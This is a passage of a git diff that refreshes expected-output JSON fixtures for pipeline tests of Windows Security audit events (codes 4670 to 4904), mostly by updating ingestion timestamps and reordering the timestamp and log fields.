"/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4670_WindowsSrv2016.xml" + } + }, "host": { "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:44.690319700Z", + "ingested": "2021-12-14T14:55:38.105503646Z", "code": "4670", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json index 469ff90b096..a480dfbf90c 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json @@ -78,7 +78,7 @@ "name": "DC01.contoso.local" }, "event": { - "ingested": "2021-12-09T13:45:44.903413300Z", + "ingested": "2021-12-14T14:55:38.313035152Z", "code": "4674", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json index 54b8be2335c..8a39a9ae36b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:45.106391100Z", + "ingested": "2021-12-14T14:55:38.531126868Z", "code": "4706", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json index 5b16cece242..2d2ff8f6040 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:45.304077500Z", + "ingested": "2021-12-14T14:55:38.724210038Z", "code": "4707", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json index d79374ea1ce..3b3dacb8cb6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:45.483796500Z", + "ingested": "2021-12-14T14:55:38.905610976Z", "code": "4713", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json index 14e520329c0..aed04fb8c0b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:45.661333200Z", + "ingested": "2021-12-14T14:55:39.091184694Z", "code": "4716", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json index 0eda1467ded..d9561e4e5a6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-12-09T13:45:45.852303500Z", + "ingested": "2021-12-14T14:55:39.287024273Z", "code": "4717", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json index 35e09f28bef..0a29747e219 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-12-09T13:45:46.036199Z", + "ingested": "2021-12-14T14:55:39.461239359Z", "code": "4718", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json index cbe653566e4..d425afdf396 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:46.213355200Z", + "ingested": "2021-12-14T14:55:39.642872904Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json index 33448147c89..15335c32486 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json @@ -68,7 +68,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:46.399837400Z", + "ingested": "2021-12-14T14:55:39.829378557Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json index bb727351068..4ac4f87593a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json @@ -66,7 +66,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:46.588490400Z", + "ingested": "2021-12-14T14:55:40.014118672Z", "code": "4739", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json index 5b1f65f4192..730bf8cca46 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json @@ -68,7 +68,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:46.772189Z", + "ingested": "2021-12-14T14:55:40.204889270Z", "code": "4743", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json index ba037feef6c..32f3d91ec72 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-18T16:26:46.874Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4744.xml" - } - }, - "@timestamp": "2019-12-18T16:26:46.874Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4744.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:46.953035400Z", + "ingested": "2021-12-14T14:55:40.391162113Z", "code": "4744", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json index 0f4f115b078..e67540c1973 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-18T16:29:05.017Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4745.xml" - } - }, - "@timestamp": "2019-12-18T16:29:05.017Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4745.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:47.159830400Z", + "ingested": "2021-12-14T14:55:40.582677378Z", "code": "4745", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json index 080211b5cbb..6a351afd0f1 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-18T16:31:01.611Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4746.xml" - } - }, - "@timestamp": "2019-12-18T16:31:01.611Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4746.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:47.362122900Z", + "ingested": "2021-12-14T14:55:40.782975453Z", "code": "4746", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json index 6747dcd6d3b..8635a3f2460 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-18T16:35:16.681Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4747.xml" - } - }, - "@timestamp": "2019-12-18T16:35:16.681Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4747.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:47.619501500Z", + "ingested": "2021-12-14T14:55:41.047058970Z", "code": "4747", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json index 5284df6be39..cb5edaaa835 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:01:45.982Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4748.xml" - } - }, - "@timestamp": "2019-12-19T08:01:45.982Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4748.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:47.872340400Z", + "ingested": "2021-12-14T14:55:41.305165933Z", "code": "4748", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json index 664c3099fc3..1ff77cc16ac 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:03:42.723Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4749.xml" - } - }, - "@timestamp": "2019-12-19T08:03:42.723Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4749.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.060639100Z", + "ingested": "2021-12-14T14:55:41.501015864Z", "code": "4749", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json index c1269a77ab7..7ac51b173fc 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:10:57.473Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4750.xml" - } - }, - "@timestamp": "2019-12-19T08:10:57.473Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4750.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.257955300Z", + "ingested": "2021-12-14T14:55:41.693592463Z", "code": "4750", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json index 8dfdfc48e48..baaddd72d20 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:20:29.088Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4751.xml" - } - }, - "@timestamp": "2019-12-19T08:20:29.088Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4751.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.462964900Z", + "ingested": "2021-12-14T14:55:41.892709660Z", "code": "4751", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json index 442e3fd7d1b..8ac9597db55 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:21:23.644Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4752.xml" - } - }, - "@timestamp": "2019-12-19T08:21:23.644Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4752.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.720114100Z", + "ingested": "2021-12-14T14:55:42.161596899Z", "code": "4752", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json index 295846351c0..3686c518008 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:24:36.595Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4753.xml" - } - }, - "@timestamp": "2019-12-19T08:24:36.595Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4753.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.972013Z", + "ingested": "2021-12-14T14:55:42.422808512Z", "code": "4753", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json index 18dece12a65..2e4cae9d69e 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:26:26.143Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4759.xml" - } - }, - "@timestamp": "2019-12-19T08:26:26.143Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4759.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:49.162535600Z", + "ingested": "2021-12-14T14:55:42.614057428Z", "code": "4759", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json index 60497ade63b..8ae18e5d50e 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:28:21.030Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4760.xml" - } - }, - "@timestamp": "2019-12-19T08:28:21.030Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4760.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:49.356213Z", + "ingested": "2021-12-14T14:55:42.807120269Z", "code": "4760", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json index 1c4f746a96e..1ec6036abca 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:29:38.448Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4761.xml" - } - }, - "@timestamp": "2019-12-19T08:29:38.448Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4761.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:49.561917300Z", + "ingested": "2021-12-14T14:55:43.000331714Z", "code": "4761", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json index f8891896198..8106624d6e3 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:33:25.967Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4762.xml" - } - }, - "@timestamp": "2019-12-19T08:33:25.967Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4762.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:49.822688Z", + "ingested": "2021-12-14T14:55:43.269154696Z", "code": "4762", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json index 1adcefc4726..e5d62aef3ed 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:34:23.162Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4763.xml" - } - }, - "@timestamp": "2019-12-19T08:34:23.162Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4763.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:50.082779300Z", + "ingested": "2021-12-14T14:55:43.527963590Z", "code": "4763", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json index 68ec14da47f..c742dde3129 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.270227300Z", + "ingested": "2021-12-14T14:55:43.719761555Z", "code": "4817", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json index b170f36ffed..0ae10581113 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json @@ -47,7 +47,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:50.449397500Z", + "ingested": "2021-12-14T14:55:43.900717433Z", "code": "4902", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json index 270cb476576..73e738db59b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json @@ -13,6 +13,7 @@ "pid": 3608, "executable": "C:\\Windows\\System32\\inetsrv\\inetinfo.exe" }, + "@timestamp": "2020-08-19T07:56:52.019Z", "winlog": { "computer_name": "WIN-BVM4LI1L1Q6.TEST.local", "process": { @@ -46,13 +47,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4904_WindowsSrv2016.xml" - } - }, - "@timestamp": "2020-08-19T07:56:52.019Z", "ecs": { "version": "1.12.0" }, @@ -61,11 +55,17 @@ "WIN-BVM4LI1L1Q6$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4904_WindowsSrv2016.xml" + } + }, "host": { "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - 